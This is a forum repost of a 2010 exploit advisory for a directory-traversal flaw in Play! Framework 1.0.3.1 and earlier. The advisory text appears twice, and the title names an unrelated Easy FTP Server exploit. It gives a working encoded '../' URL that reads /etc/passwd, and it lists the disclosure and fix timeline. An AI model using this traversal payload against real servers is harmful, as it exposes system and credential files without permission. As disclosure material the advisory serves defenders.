-
-
[转帖]# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE an
-
2010-8-11 12:09 3207
-
[转帖]# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE an
2010-8-11 12:09
3207
Exploit Title: Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability
Date: July 24, 2010
Author: kripthor
Software Link: http://www.playframework.org/
Version: Play! Framework <= 1.0.3.1
Tested on: Ubuntu 10
CVE : N/A
Notes: 28/07/2010 at 14:03 - Developer contacted
28/07/2010 at 15:04 - Fix released
10/08/2010 at 17:00 - Exploit published
References: www.playframework.com
An attacker can download any file that the owner of the Play! process can read.
Simply browse to:
http://127.0.0.1:9000/public/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file.
Typically an images or css directory on the server.
Date: July 24, 2010
Author: kripthor
Software Link: http://www.playframework.org/
Version: Play! Framework <= 1.0.3.1
Tested on: Ubuntu 10
CVE : N/A
Notes: 28/07/2010 at 14:03 - Developer contacted
28/07/2010 at 15:04 - Fix released
10/08/2010 at 17:00 - Exploit published
References: www.playframework.com
An attacker can download any file that the owner of the Play! process can read.
Simply browse to:
http://127.0.0.1:9000/public/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file.
Typically an images or css directory on the server.
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
赞赏
他的文章
看原图